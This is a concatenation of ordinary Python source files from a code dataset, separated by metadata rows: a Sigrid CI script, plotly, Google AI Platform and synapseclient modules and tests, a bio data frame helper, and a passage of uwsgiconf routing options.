            return "None"
        return "\n".join([self.formatRefactoringCandidate(rc) for rc in refactoringCandidates])

    def formatRefactoringCandidate(self, rc):
        """Render a single refactoring candidate as an HTML snippet."""
        subjectName = html.escape(rc["subject"]).replace("\n", "<br />").replace("::", "<br />")
        category = html.escape(rc["category"])
        return f"<span><em>({category})</em><div>{subjectName}</div></span>"

    def formatHtmlStars(self, ratings, metric):
        """Render a rating as a 5-star widget followed by the numeric value."""
        if ratings.get(metric, None) is None:
            return "N/A"
        # Round to the nearest whole star, capped at 5.
        stars = min(int(ratings[metric] + 0.5), 5)
        fullStars = stars * self.HTML_STAR_FULL
        emptyStars = (5 - stars) * self.HTML_STAR_EMPTY
        rating = self.formatRating(ratings, metric)
        return f"<strong class=\"stars{stars}\">{fullStars}{emptyStars}</strong> " + rating
class ExitCodeReport(Report):
    """Concludes a Sigrid CI run: prints a success/failure banner and,
    when the target was not met, fails the build via the exit code."""

    def generate(self, feedback, args, target):
        banner = TextReport()
        passed = target.meetsOverallQualityTarget(feedback)
        if passed:
            message = "\n** SIGRID CI RUN COMPLETE: YOU WROTE MAINTAINABLE CODE AND REACHED THE TARGET **\n"
            color = banner.ANSI_BOLD + banner.ANSI_GREEN
        else:
            message = "\n** SIGRID CI RUN COMPLETE: THE CODE YOU WROTE DID NOT MEET THE TARGET FOR MAINTAINABLE CODE **\n"
            color = banner.ANSI_BOLD + banner.ANSI_YELLOW
        banner.printColor(message, color)
        # If you publish(only) we never break the build.
        # We can break the build when running on a branch or pull request.
        if not passed and not args.publish:
            sys.exit(1)
if __name__ == "__main__":
    # Command-line entry point for the Sigrid CI pipeline: parse arguments,
    # validate the environment, upload the source code, and (unless running
    # in publish-only mode) fetch the analysis results and render reports.
    parser = argparse.ArgumentParser()
    parser.add_argument("--partner", type=str, default="sig")
    parser.add_argument("--customer", type=str)
    parser.add_argument("--system", type=str)
    parser.add_argument("--source", type=str)
    parser.add_argument("--targetquality", type=float, default=3.5)
    parser.add_argument("--publish", action="store_true")
    parser.add_argument("--publishonly", action="store_true")
    parser.add_argument("--exclude", type=str, default="")
    parser.add_argument("--pathprefix", type=str, default="")
    parser.add_argument("--showupload", action="store_true")
    parser.add_argument("--history", action="store_true")
    parser.add_argument("--sigridurl", type=str, default="https://sigrid-says.com")
    args = parser.parse_args()

    # --customer, --system and --source are mandatory.
    if args.customer == None or args.system == None or args.source == None:
        parser.print_help()
        sys.exit(1)

    if sys.version_info.major == 2 or sys.version_info.minor < 7:
        print("Sigrid CI requires Python 3.7 or higher")
        sys.exit(1)

    # Credentials are passed via environment variables, never via arguments.
    if not "SIGRID_CI_ACCOUNT" in os.environ or not "SIGRID_CI_TOKEN" in os.environ:
        print("Sigrid account not found in environment variables SIGRID_CI_ACCOUNT and SIGRID_CI_TOKEN")
        sys.exit(1)

    if not os.path.exists(args.source):
        print("Source code directory not found: " + args.source)
        sys.exit(1)

    if args.publish and len(args.pathprefix) > 0:
        print("You cannot use both --publish and --pathprefix at the same time, refer to the documentation for details")
        sys.exit(1)

    log("Starting Sigrid CI")
    # NOTE(review): UploadOptions is defined elsewhere in this module
    # (not visible in this chunk).
    options = UploadOptions(args.source, args.exclude.split(","), args.history, args.pathprefix, args.showupload)
    target = TargetQuality(f"{args.source}/sigrid.yaml", args.targetquality)
    apiClient = SigridApiClient(args)
    analysisId = apiClient.submitUpload(options)

    if args.publishonly:
        log("Your project's source code has been published to Sigrid")
    else:
        # Render the feedback in all output formats; ExitCodeReport runs last
        # because it may terminate the process via sys.exit.
        feedback = apiClient.fetchAnalysisResults(analysisId)
        for report in [TextReport(), StaticHtmlReport(), ExitCodeReport()]:
            report.generate(feedback, args, target)
| 41.682474 | 135 | 0.616838 |
e15cb473b9e86f402c7cc6e07595cd1b2e600dc4 | 237 | py | Python | example/example.py | getveryrichet/example_pip_package | b72b66014ac72bb24b6e31679632e51321ecb96c | [
"MIT"
] | null | null | null | example/example.py | getveryrichet/example_pip_package | b72b66014ac72bb24b6e31679632e51321ecb96c | [
"MIT"
] | null | null | null | example/example.py | getveryrichet/example_pip_package | b72b66014ac72bb24b6e31679632e51321ecb96c | [
"MIT"
] | null | null | null | import numpy as np
# after from example import example
# allows using example.child_example.child_example()
from .child import child_example
def hello_requests():
    """Print the imported numpy module object (dependency smoke test).

    NOTE(review): despite the name, this touches numpy, not requests --
    confirm the intended purpose.
    """
    print(np)
def check_time():
    """Delegate to the child module's example time helper."""
    child_example.child_example_time()
014e682ff638c2da45728fa7575ef829c6887e07 | 7,024 | py | Python | env/Lib/site-packages/plotly/graph_objs/cone/colorbar/_title.py | andresgreen-byte/Laboratorio-1--Inversion-de-Capital | 8a4707301d19c3826c31026c4077930bcd6a8182 | [
"MIT"
] | 7 | 2022-01-16T12:28:16.000Z | 2022-03-04T15:31:45.000Z | env/Lib/site-packages/plotly/graph_objs/cone/colorbar/_title.py | andresgreen-byte/Laboratorio-1--Inversion-de-Capital | 8a4707301d19c3826c31026c4077930bcd6a8182 | [
"MIT"
] | 14 | 2021-10-20T23:33:47.000Z | 2021-12-21T04:50:37.000Z | env/Lib/site-packages/plotly/graph_objs/cone/colorbar/_title.py | andresgreen-byte/Laboratorio-1--Inversion-de-Capital | 8a4707301d19c3826c31026c4077930bcd6a8182 | [
"MIT"
] | null | null | null | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Title(_BaseTraceHierarchyType):
    """Title of a cone trace's color bar: text content, font and placement.

    NOTE(review): this class follows the structure of plotly's generated
    graph-object classes -- presumably code-generated; confirm before
    hand-editing.
    """

    # class properties
    # --------------------
    _parent_path_str = "cone.colorbar"
    _path_str = "cone.colorbar.title"
    _valid_props = {"font", "side", "text"}

    # font
    # ----
    @property
    def font(self):
        """
        Sets this color bar's title font. Note that the title's font
        used to be set by the now deprecated `titlefont` attribute.

        The 'font' property is an instance of Font
        that may be specified as:
          - An instance of :class:`plotly.graph_objs.cone.colorbar.title.Font`
          - A dict of string/value properties that will be passed
            to the Font constructor

            Supported dict properties:

                color

                family
                    HTML font family - the typeface that will be
                    applied by the web browser. The web browser
                    will only be able to apply a font if it is
                    available on the system which it operates.
                    Provide multiple font families, separated by
                    commas, to indicate the preference in which to
                    apply fonts if they aren't available on the
                    system. The Chart Studio Cloud (at
                    https://chart-studio.plotly.com or on-premise)
                    generates images on a server, where only a
                    select number of fonts are installed and
                    supported. These include "Arial", "Balto",
                    "Courier New", "Droid Sans",, "Droid Serif",
                    "Droid Sans Mono", "Gravitas One", "Old
                    Standard TT", "Open Sans", "Overpass", "PT Sans
                    Narrow", "Raleway", "Times New Roman".

                size

        Returns
        -------
        plotly.graph_objs.cone.colorbar.title.Font
        """
        return self["font"]

    @font.setter
    def font(self, val):
        self["font"] = val

    # side
    # ----
    @property
    def side(self):
        """
        Determines the location of color bar's title with respect to
        the color bar. Defaults to "top" when `orientation` if "v" and
        defaults to "right" when `orientation` if "h". Note that the
        title's location used to be set by the now deprecated
        `titleside` attribute.

        The 'side' property is an enumeration that may be specified as:
          - One of the following enumeration values:
                ['right', 'top', 'bottom']

        Returns
        -------
        Any
        """
        return self["side"]

    @side.setter
    def side(self, val):
        self["side"] = val

    # text
    # ----
    @property
    def text(self):
        """
        Sets the title of the color bar. Note that before the existence
        of `title.text`, the title's contents used to be defined as the
        `title` attribute itself. This behavior has been deprecated.

        The 'text' property is a string and must be specified as:
          - A string
          - A number that will be converted to a string

        Returns
        -------
        str
        """
        return self["text"]

    @text.setter
    def text(self, val):
        self["text"] = val

    # Self properties description
    # ---------------------------
    @property
    def _prop_descriptions(self):
        return """\
        font
            Sets this color bar's title font. Note that the title's
            font used to be set by the now deprecated `titlefont`
            attribute.
        side
            Determines the location of color bar's title with
            respect to the color bar. Defaults to "top" when
            `orientation` if "v" and defaults to "right" when
            `orientation` if "h". Note that the title's location
            used to be set by the now deprecated `titleside`
            attribute.
        text
            Sets the title of the color bar. Note that before the
            existence of `title.text`, the title's contents used to
            be defined as the `title` attribute itself. This
            behavior has been deprecated.
        """

    def __init__(self, arg=None, font=None, side=None, text=None, **kwargs):
        """
        Construct a new Title object

        Parameters
        ----------
        arg
            dict of properties compatible with this constructor or
            an instance of
            :class:`plotly.graph_objs.cone.colorbar.Title`
        font
            Sets this color bar's title font. Note that the title's
            font used to be set by the now deprecated `titlefont`
            attribute.
        side
            Determines the location of color bar's title with
            respect to the color bar. Defaults to "top" when
            `orientation` if "v" and defaults to "right" when
            `orientation` if "h". Note that the title's location
            used to be set by the now deprecated `titleside`
            attribute.
        text
            Sets the title of the color bar. Note that before the
            existence of `title.text`, the title's contents used to
            be defined as the `title` attribute itself. This
            behavior has been deprecated.

        Returns
        -------
        Title
        """
        super(Title, self).__init__("title")

        # Internal construction path: parent supplies state directly.
        if "_parent" in kwargs:
            self._parent = kwargs["_parent"]
            return

        # Validate arg
        # ------------
        if arg is None:
            arg = {}
        elif isinstance(arg, self.__class__):
            arg = arg.to_plotly_json()
        elif isinstance(arg, dict):
            # Copy so mutations below don't affect the caller's dict.
            arg = _copy.copy(arg)
        else:
            raise ValueError(
                """\
The first argument to the plotly.graph_objs.cone.colorbar.Title
constructor must be a dict or
an instance of :class:`plotly.graph_objs.cone.colorbar.Title`"""
            )

        # Handle skip_invalid
        # -------------------
        self._skip_invalid = kwargs.pop("skip_invalid", False)
        self._validate = kwargs.pop("_validate", True)

        # Populate data dict with properties
        # ----------------------------------
        # Explicit keyword arguments take precedence over values in `arg`.
        _v = arg.pop("font", None)
        _v = font if font is not None else _v
        if _v is not None:
            self["font"] = _v
        _v = arg.pop("side", None)
        _v = side if side is not None else _v
        if _v is not None:
            self["side"] = _v
        _v = arg.pop("text", None)
        _v = text if text is not None else _v
        if _v is not None:
            self["text"] = _v

        # Process unknown kwargs
        # ----------------------
        self._process_kwargs(**dict(arg, **kwargs))

        # Reset skip_invalid
        # ------------------
        self._skip_invalid = False
3c526dd62e729b61dfcc912790b4f3616dd2887c | 1,116 | py | Python | google/cloud/aiplatform_v1/types/job_state.py | sakagarwal/python-aiplatform | 62b4a1ea589235910c6e87f027899a29bf1bacb1 | [
"Apache-2.0"
] | 1 | 2022-03-30T05:23:29.000Z | 2022-03-30T05:23:29.000Z | google/cloud/aiplatform_v1/types/job_state.py | sakagarwal/python-aiplatform | 62b4a1ea589235910c6e87f027899a29bf1bacb1 | [
"Apache-2.0"
] | null | null | null | google/cloud/aiplatform_v1/types/job_state.py | sakagarwal/python-aiplatform | 62b4a1ea589235910c6e87f027899a29bf1bacb1 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
# Register this module's enum manifest with the protobuf runtime.
__protobuf__ = proto.module(
    package="google.cloud.aiplatform.v1", manifest={"JobState",},
)


class JobState(proto.Enum):
    r"""Describes the state of a job."""
    JOB_STATE_UNSPECIFIED = 0
    JOB_STATE_QUEUED = 1
    JOB_STATE_PENDING = 2
    JOB_STATE_RUNNING = 3
    JOB_STATE_SUCCEEDED = 4
    JOB_STATE_FAILED = 5
    JOB_STATE_CANCELLING = 6
    JOB_STATE_CANCELLED = 7
    JOB_STATE_PAUSED = 8
    JOB_STATE_EXPIRED = 9


# Public API of this module is exactly the registered manifest.
__all__ = tuple(sorted(__protobuf__.manifest))
d232b04b709b7a1c7c04ca69739584fcb89073ae | 6,497 | py | Python | tests/unit/unit_test_annotations.py | Burrch3s/synapsePythonClient | 2d1bcca576d43118c78b2e81db69ac6e5bfbf8f5 | [
"Apache-2.0"
] | null | null | null | tests/unit/unit_test_annotations.py | Burrch3s/synapsePythonClient | 2d1bcca576d43118c78b2e81db69ac6e5bfbf8f5 | [
"Apache-2.0"
] | null | null | null | tests/unit/unit_test_annotations.py | Burrch3s/synapsePythonClient | 2d1bcca576d43118c78b2e81db69ac6e5bfbf8f5 | [
"Apache-2.0"
] | null | null | null | # unit tests for python synapse client
############################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import OrderedDict
from datetime import datetime as Datetime
from nose.tools import assert_raises, assert_equals, assert_false, assert_true, assert_greater, assert_is_instance
from math import pi
from synapseclient.annotations import to_synapse_annotations, from_synapse_annotations,\
to_submission_status_annotations, from_submission_status_annotations, set_privacy
from synapseclient.exceptions import *
def test_annotations():
"""Test string annotations"""
a = dict(foo='bar', zoo=['zing', 'zaboo'], species='Platypus')
sa = to_synapse_annotations(a)
assert_equals(sa['stringAnnotations']['foo'], ['bar'])
assert_equals(sa['stringAnnotations']['zoo'], ['zing', 'zaboo'])
assert_equals(sa['stringAnnotations']['species'], ['Platypus'])
def test_annotation_name_collision():
    """Test handling of a name collisions between typed user generated and untyped
    system generated annotations, see SYNPY-203 and PLFM-3248"""
    # order is important: to repro the error, the key uri has to come before stringAnnotations
    sa = OrderedDict()
    sa[u'uri'] = u'/entity/syn47396/annotations'
    sa[u'doubleAnnotations'] = {}
    sa[u'longAnnotations'] = {}
    sa[u'stringAnnotations'] = {
        'tissueType': ['Blood'],
        # 'uri' collides with the system-generated top-level 'uri' key above.
        'uri': ['/repo/v1/dataset/47396']}
    sa[u'creationDate'] = u'1321168909232'
    sa[u'id'] = u'syn47396'

    a = from_synapse_annotations(sa)
    # The user-generated string annotation must win over the system key.
    assert_equals(a['tissueType'], ['Blood'])
def test_more_annotations():
    """Test long, float and data annotations"""
    a = dict(foo=1234,
             zoo=[123.1, 456.2, 789.3],
             species='Platypus',
             birthdays=[Datetime(1969, 4, 28), Datetime(1973, 12, 8), Datetime(2008, 1, 3)],
             test_boolean=True,
             test_mo_booleans=[False, True, True, False])
    sa = to_synapse_annotations(a)
    # Each Python type maps to its own typed bucket; booleans are stored
    # as lower-case strings.
    assert_equals(sa['longAnnotations']['foo'], [1234])
    assert_equals(sa['doubleAnnotations']['zoo'], [123.1, 456.2, 789.3])
    assert_equals(sa['stringAnnotations']['species'], ['Platypus'])
    assert_equals(sa['stringAnnotations']['test_boolean'], ['true'])
    assert_equals(sa['stringAnnotations']['test_mo_booleans'], ['false', 'true', 'true', 'false'])

    # this part of the test is kinda fragile. It it breaks again, it should be removed
    bdays = [utils.from_unix_epoch_time(t) for t in sa['dateAnnotations']['birthdays']]
    assert_true(all([t in bdays for t in [Datetime(1969, 4, 28), Datetime(1973, 12, 8), Datetime(2008, 1, 3)]]))
def test_annotations_unicode():
    """Unicode keys and values must survive conversion to the synapse format."""
    a = {'files': [u'tmp6y5tVr.txt'], 'cacheDir': u'/Users/chris/.synapseCache/python/syn1809087', u'foo': 1266}
    sa = to_synapse_annotations(a)
    assert_equals(sa['stringAnnotations']['cacheDir'], [u'/Users/chris/.synapseCache/python/syn1809087'])
def test_round_trip_annotations():
    """Test that annotations can make the round trip from a simple dictionary
    to the synapse format and back without losing information."""
    a = dict(foo=1234, zoo=[123.1, 456.2, 789.3], species='Moose',
             birthdays=[Datetime(1969, 4, 28), Datetime(1973, 12, 8), Datetime(2008, 1, 3), Datetime(2013, 3, 15)])
    sa = to_synapse_annotations(a)
    a2 = from_synapse_annotations(sa)
    # The original ended with `a = a2`, which asserted nothing and made the
    # test vacuous; actually compare the round-tripped annotations.
    assert_equals(a, a2)
def test_mixed_annotations():
    """test that to_synapse_annotations will coerce a list of mixed types to strings"""
    a = dict(foo=[1, 'a', Datetime(1969, 4, 28, 11, 47)])
    sa = to_synapse_annotations(a)
    a2 = from_synapse_annotations(sa)
    assert_equals(a2['foo'][0], '1')
    assert_equals(a2['foo'][1], 'a')
    # The datetime is stringified; only check that the year survives.
    assert_greater(a2['foo'][2].find('1969'), -1)
def test_idempotent_annotations():
    """test that to_synapse_annotations won't mess up a dictionary that's already in the synapse format"""
    a = dict(species='Moose', n=42, birthday=Datetime(1969, 4, 28))
    sa = to_synapse_annotations(a)
    a2 = dict()
    a2.update(sa)
    # Converting an already-converted structure must be a no-op.
    sa2 = to_synapse_annotations(a2)
    assert_equals(sa, sa2)
def test_submission_status_annotations_round_trip():
    """Round-trip a mixed-type dict through the submission-status annotation
    format, including the isPrivate flag handling."""
    april_28_1969 = Datetime(1969, 4, 28)
    a = dict(screen_name='Bullwinkle', species='Moose', lucky=13, pi=pi, birthday=april_28_1969)
    sa = to_submission_status_annotations(a)
    # Strings go to stringAnnos as key/value pair objects.
    assert_equals({'screen_name', 'species'}, set([kvp['key'] for kvp in sa['stringAnnos']]))
    assert_equals({'Bullwinkle', 'Moose'}, set([kvp['value'] for kvp in sa['stringAnnos']]))

    # test idempotence
    assert_equals(sa, to_submission_status_annotations(sa))

    # Integers and dates go to longAnnos (dates as unix epoch millis).
    assert_equals({'lucky', 'birthday'}, set([kvp['key'] for kvp in sa['longAnnos']]))
    for kvp in sa['longAnnos']:
        key = kvp['key']
        value = kvp['value']
        if key == 'lucky':
            assert_equals(value, 13)
        if key == 'birthday':
            assert_equals(utils.from_unix_epoch_time(value), april_28_1969)

    assert_equals({'pi'}, set([kvp['key'] for kvp in sa['doubleAnnos']]))
    assert_equals({pi}, set([kvp['value'] for kvp in sa['doubleAnnos']]))

    # Privacy can be toggled per key; unknown keys raise KeyError.
    set_privacy(sa, key='screen_name', is_private=False)
    assert_raises(KeyError, set_privacy, sa, key='this_key_does_not_exist', is_private=False)

    for kvp in sa['stringAnnos']:
        if kvp['key'] == 'screen_name':
            assert_false(kvp['isPrivate'])

    a2 = from_submission_status_annotations(sa)
    # TODO: is there a way to convert dates back from longs automatically?
    a2['birthday'] = utils.from_unix_epoch_time(a2['birthday'])
    assert_equals(a, a2)

    # test idempotence
    assert_equals(a, from_submission_status_annotations(a))
def test_submission_status_double_annos():
    """Double annotations with integral values must stay floats on conversion."""
    ssa = {'longAnnos': [{'isPrivate': False, 'value': 13, 'key': 'lucky'}],
           'doubleAnnos': [{'isPrivate': False, 'value': 3, 'key': 'three'},
                           {'isPrivate': False, 'value': pi, 'key': 'pi'}]}
    # test that the double annotation 'three':3 is interpreted as a floating
    # point 3.0 rather than an integer 3
    annotations = from_submission_status_annotations(ssa)
    assert_is_instance(annotations['three'], float)

    ssa2 = to_submission_status_annotations(annotations)
    # The float must go back into doubleAnnos, not be demoted to longAnnos.
    assert_equals({'three', 'pi'}, set([kvp['key'] for kvp in ssa2['doubleAnnos']]))
    assert_equals({'lucky'}, set([kvp['key'] for kvp in ssa2['longAnnos']]))
945199c8b87a369bc40d7ffd58413ad1ecd42e24 | 1,657 | py | Python | pandna/base_bio_data_frame.py | dceoy/pandaseq | 2679bc232497e285ba8a09c394863eb6affc580a | [
"MIT"
] | null | null | null | pandna/base_bio_data_frame.py | dceoy/pandaseq | 2679bc232497e285ba8a09c394863eb6affc580a | [
"MIT"
] | null | null | null | pandna/base_bio_data_frame.py | dceoy/pandaseq | 2679bc232497e285ba8a09c394863eb6affc580a | [
"MIT"
] | null | null | null | #!/usr/bin/env python
#
# Pandas-based Data Frame Handlers DNA-sequencing
# https://github.com/dceoy/pandna
from abc import ABCMeta, abstractmethod
import os
import subprocess
import pandas as pd
class BaseBioDataFrame(object, metaclass=ABCMeta):
    """Abstract base class for pandas-backed handlers of bio data files.

    Subclasses implement load() to populate ``self.df`` from ``self.path``.
    """

    def __init__(self, path, supported_exts=()):
        """Validate the input path and extension and initialize an empty frame.

        Raises BioDataFrameError when the file is missing or its extension
        is not in supported_exts (an empty supported_exts accepts anything).
        """
        if os.path.isfile(path):
            self.path = path
        else:
            raise BioDataFrameError('file not found: {}'.format(path))
        # any() instead of building an intermediate list of matching extensions.
        # Default changed from a mutable [] to an immutable () (same semantics).
        if supported_exts and not any(path.endswith(x) for x in supported_exts):
            raise BioDataFrameError('invalid file extension: {}'.format(path))
        self.df = pd.DataFrame()

    @abstractmethod
    def load(self):
        """Populate self.df from self.path; implemented by subclasses."""
        pass

    def load_and_output_df(self):
        """Load the file and return the resulting data frame."""
        self.load()
        return self.df

    def write_df(self, path, mode='w', **kwargs):
        """Write header lines (if any) followed by the CSV-serialized frame.

        NOTE(review): relies on ``self.header`` being set before this is
        called (it is not initialized here) -- confirm subclasses define it.
        """
        if self.header:
            with open(path, mode=mode) as f:
                for h in self.header:
                    f.write(h + os.linesep)
        self.df.to_csv(path, mode=('a' if self.header else 'w'), **kwargs)

    @staticmethod
    def run_and_parse_subprocess(args, stdout=subprocess.PIPE, **kwargs):
        """Run a subprocess and yield its stdout line by line (decoded UTF-8).

        Raises subprocess.CalledProcessError when the command exits non-zero.
        """
        with subprocess.Popen(args=args, stdout=stdout, **kwargs) as p:
            for line in p.stdout:
                yield line.decode('utf-8')
            outs, errs = p.communicate()
            # Direct non-zero check instead of the original
            # `if returncode == 0: pass / else: raise` inversion.
            if p.returncode != 0:
                raise subprocess.CalledProcessError(
                    returncode=p.returncode, cmd=p.args, output=outs,
                    stderr=errs
                )
class BioDataFrameError(RuntimeError):
    """Raised by BaseBioDataFrame for invalid input files (missing path
    or unsupported file extension)."""
    pass
| 30.127273 | 78 | 0.592034 |
8abfff184db95a5821dff4ad5ed2969625a304f4 | 13,329 | py | Python | uwsgiconf/options/routing.py | graceshaw/uwsgiconf | 205289bb279dfbcc1d9bfd599dd8ca5d6c527077 | [
"BSD-3-Clause"
] | null | null | null | uwsgiconf/options/routing.py | graceshaw/uwsgiconf | 205289bb279dfbcc1d9bfd599dd8ca5d6c527077 | [
"BSD-3-Clause"
] | null | null | null | uwsgiconf/options/routing.py | graceshaw/uwsgiconf | 205289bb279dfbcc1d9bfd599dd8ca5d6c527077 | [
"BSD-3-Clause"
] | null | null | null | import os
from .routing_actions import *
from .routing_modifiers import *
from .routing_routers import *
from .routing_subjects import *
from .routing_vars import *
from ..base import OptionsGroup
from ..exceptions import ConfigurationError
from ..utils import listify
class RouteRule:
"""Represents a routing rule."""
class vars:
"""Routing variables."""
cookie = VarCookie
geoip = VarGeoip
httptime = VarHttptime
metric = VarMetric
query = VarQuery
request = VarRequest
time = VarTime
uwsgi = VarUwsgi
class var_functions:
"""Functions that can be applied to variables."""
base64 = FuncBase64
hex = FuncHex
lower = FuncLower
math = FuncMath
mime = FuncMime
upper = FuncUpper
class stages:
"""During the request cycle, various stages (aka chains) are processed.
Chains can be "recursive". A recursive chain can be called multiple times
in a request cycle.
"""
REQUEST = ''
"""Applied before the request is passed to the plugin."""
ERROR = 'error'
"""Applied as soon as an HTTP status code is generate. **Recursive chain**."""
RESPONSE = 'response'
"""Applied after the last response header has been generated (just before sending the body)."""
FINAL = 'final'
"""Applied after the response has been sent to the client."""
class subjects:
"""Routing subjects. These can be request's variables or other entities.
.. note:: Non-custom subjects can be pre-optimized (during startup)
and should be used for performance reasons.
"""
custom = SubjectCustom
http_host = SubjectHttpHost
http_referer = SubjectHttpReferer
http_user_agent = SubjectHttpUserAgent
path_info = SubjectPathInfo
query_string = SubjectQueryString
remote_addr = SubjectRemoteAddr
remote_user = SubjectRemoteUser
request_uri = SubjectRequestUri
status = SubjectStatus
class transforms:
"""A transformation is like a filter applied to the response
generated by your application.
Transformations can be chained (the output of a transformation will be the input of the following one)
and can completely overwrite response headers.
* http://uwsgi.readthedocs.io/en/latest/Transformations.html
"""
chunked = ActionChunked
fix_content_len = ActionFixContentLen
flush = ActionFlush
gzip = ActionGzip
template = ActionTemplate
to_file = ActionToFile
upper = ActionUpper
# todo Consider adding the following and some others from sources (incl. plugins):
# xslt, cachestore, memcachedstore, redisstore, rpc, lua
class actions:
"""Actions available for routing rules.
Values returned by actions:
* ``NEXT`` - continue to the next rule
* ``CONTINUE`` - stop scanning the internal routing table and run the request
* ``BREAK`` - stop scanning the internal routing table and close the request
* ``GOTO x`` - go to rule ``x``
"""
add_var_cgi = ActionAddVarCgi
add_var_log = ActionAddVarLog
alarm = ActionAlarm
auth_basic = ActionAuthBasic
auth_ldap = AuthLdap
dir_change = ActionDirChange
do_break = ActionDoBreak
do_continue = ActionDoContinue
do_goto = ActionDoGoto
fix_var_path_info = ActionFixVarPathInfo
header_add = ActionHeaderAdd
header_remove = ActionHeaderRemove
headers_off = ActionHeadersOff
headers_reset = ActionHeadersReset
log = ActionLog
offload_off = ActionOffloadOff
redirect = ActionRedirect
rewrite = ActionRewrite
route_external = ActionRouteExternal
route_uwsgi = ActionRouteUwsgi
send = ActionSend
serve_static = ActionServeStatic
set_harakiri = ActionSetHarakiri
set_script_file = ActionSetScriptFile
set_uwsgi_process_name = ActionSetUwsgiProcessName
set_var_document_root = ActionSetVarDocumentRoot
set_var_path_info = ActionSetVarPathInfo
set_var_remote_addr = ActionSetVarRemoteAddr
set_var_remote_user = ActionSetVarRemoteUser
set_var_request_method = ActionSetVarRequestMethod
set_var_request_uri = ActionSetVarRequestUri
set_var_script_name = ActionSetVarScriptName
set_var_uwsgi_appid = ActionSetVarUwsgiAppid
set_var_uwsgi_home = ActionSetVarUwsgiHome
set_var_uwsgi_scheme = ActionSetVarUwsgiScheme
signal = ActionSignal
# todo Consider adding the following and some others from sources (incl. plugins):
# cachestore, cacheset, memcached,
# router_cache: cache, cache-continue, cachevar, cacheinc, cachedec, cachemul, cachediv
# rpc,
# rpc: call, rpcret, rpcnext, rpcraw, rpcvar,
# access, spnego, radius
# xslt, ssi, gridfs
# cgi: cgi, cgihelper
# router_access: access,
# proxyhttp -router_http, proxyuwsgi -router_uwsgi, xattr -xattr
# router_memcached: memcached, memcached-continue, memcachedstore
# router_redis: redis, redis-continue, redisstore
def __init__(self, action, subject=None, stage=stages.REQUEST):
"""
:param RouteAction action: Action (or transformation) to perfrom.
See ``.actions`` and ``.transforms``.
:param SubjectCustom|SubjectBuiltin|str subject: Subject to verify before action is performed.
See ``.subjects``.
* String values are automatically transformed into ``subjects.path_info``.
* If ``None`` action is performed always w/o subject check.
:param str stage: Stage on which the action needs to be performed.
See ``.stages``.
"""
if subject is None:
subject = 'run' # always run the specified route action
elif isinstance(subject, str):
subject = self.subjects.path_info(subject)
subject_rule = ''
self._custom_subject = isinstance(subject, SubjectCustom)
if self._custom_subject:
subject_rule = subject
subject = 'if-not' if subject.negate else 'if'
elif isinstance(subject, SubjectBuiltin):
subject_rule = subject.regexp
subject = subject.name
self.command_label = f'{stage}-route-label'.strip('-')
self.command = f'{stage}-route-{subject}'.strip('-')
self.value = subject_rule, action
class Routing(OptionsGroup):
"""Routing subsystem.
You can use the internal routing subsystem to dynamically alter the way requests are handled.
.. note:: Since 1.9
* http://uwsgi.readthedocs.io/en/latest/InternalRouting.html
* http://uwsgi.readthedocs.io/en/latest/Transformations.html
"""
route_rule = RouteRule
class routers:
"""Dedicated routers, which can be used with `register_router()`."""
http = RouterHttp
https = RouterHttps
ssl = RouterSsl
fast = RouterFast
raw = RouterRaw
forkpty = RouterForkPty
tuntap = RouterTunTap
class modifiers:
"""Routing modifiers.
* http://uwsgi.readthedocs.io/en/latest/Protocol.html
"""
cache = ModifierCache
cgi = ModifierCgi
cluster_node = ModifierClusterNode
config_from_node = ModifierConfigFromNode
corerouter_signal = ModifierCorerouterSignal
echo = ModifierEcho
eval = ModifierEval
example = ModifierExample
fastfunc = ModifierFastfunc
gccgo = ModifierGccgo
glusterfs = ModifierGlusterfs
gridfs = ModifierGridfs
jvm = ModifierJvm
legion_msg = ModifierLegionMsg
lua = ModifierLua
manage = ModifierManage
manage_path_info = ModifierManagePathInfo
message = ModifierMessage
message_array = ModifierMessageArray
message_marshal = ModifierMessageMarshal
mono = ModifierMono
multicast = ModifierMulticast
multicast_announce = ModifierMulticastAnnounce
persistent_close = ModifierPersistentClose
php = ModifierPhp
ping = ModifierPing
psgi = ModifierPsgi
rack = ModifierRack
rados = ModifierRados
raw = ModifierRaw
reload = ModifierReload
reload_brutal = ModifierReloadBrutal
remote_logging = ModifierRemoteLogging
response = ModifierResponse
rpc = ModifierRpc
signal = ModifierSignal
snmp = ModifierSnmp
spooler = ModifierSpooler
ssi = ModifierSsi
subscription = ModifierSubscription
symcall = ModifierSymcall
v8 = ModifierV8
webdav = ModifierWebdav
wsgi = ModifierWsgi
xslt = ModifierXslt
def use_router(self, router, force=None):
"""
:param RouterBase router: Dedicated router object. See `.routers`.
:param bool force: All of the gateways (routers) has to be run under the master process,
supplying this you can try to bypass this limit.
"""
self._set('force-gateway', force, cast=bool)
router._contribute_to_opts(self)
return self._section
def register_route(self, route_rules, label=None):
"""Registers a routing rule.
:param RouteRule|list[RouteRule] route_rules:
:param str label: Label to mark the given set of rules.
This can be used in conjunction with ``do_goto`` rule action.
* http://uwsgi.readthedocs.io/en/latest/InternalRouting.html#goto
"""
route_rules = listify(route_rules)
if route_rules and label:
self._set(route_rules[0].command_label, label, multi=True)
for route_rules in route_rules:
self._set(route_rules.command, route_rules.value, multi=True)
return self._section
def print_routing_rules(self):
"""Print out supported routing rules (actions, transforms, etc.)."""
self._set('routers-list', True, cast=bool)
return self._section
def set_error_page(self, status, html_fpath):
"""Add an error page (html) for managed 403, 404, 500 response.
:param int status: HTTP status code.
:param str html_fpath: HTML page file path.
"""
statuses = [403, 404, 500]
status = int(status)
if status not in statuses:
raise ConfigurationError(
f"Code `{status}` for `routing.set_error_page()` is unsupported. "
f"Supported: {', '.join(map(str, statuses))}")
self._set(f'error-page-{status}', html_fpath, multi=True)
return self._section
def set_error_pages(self, codes_map=None, common_prefix=None):
"""Add an error pages for managed 403, 404, 500 responses.
Shortcut for ``.set_error_page()``.
:param dict codes_map: Status code mapped into an html filepath or
just a filename if common_prefix is used.
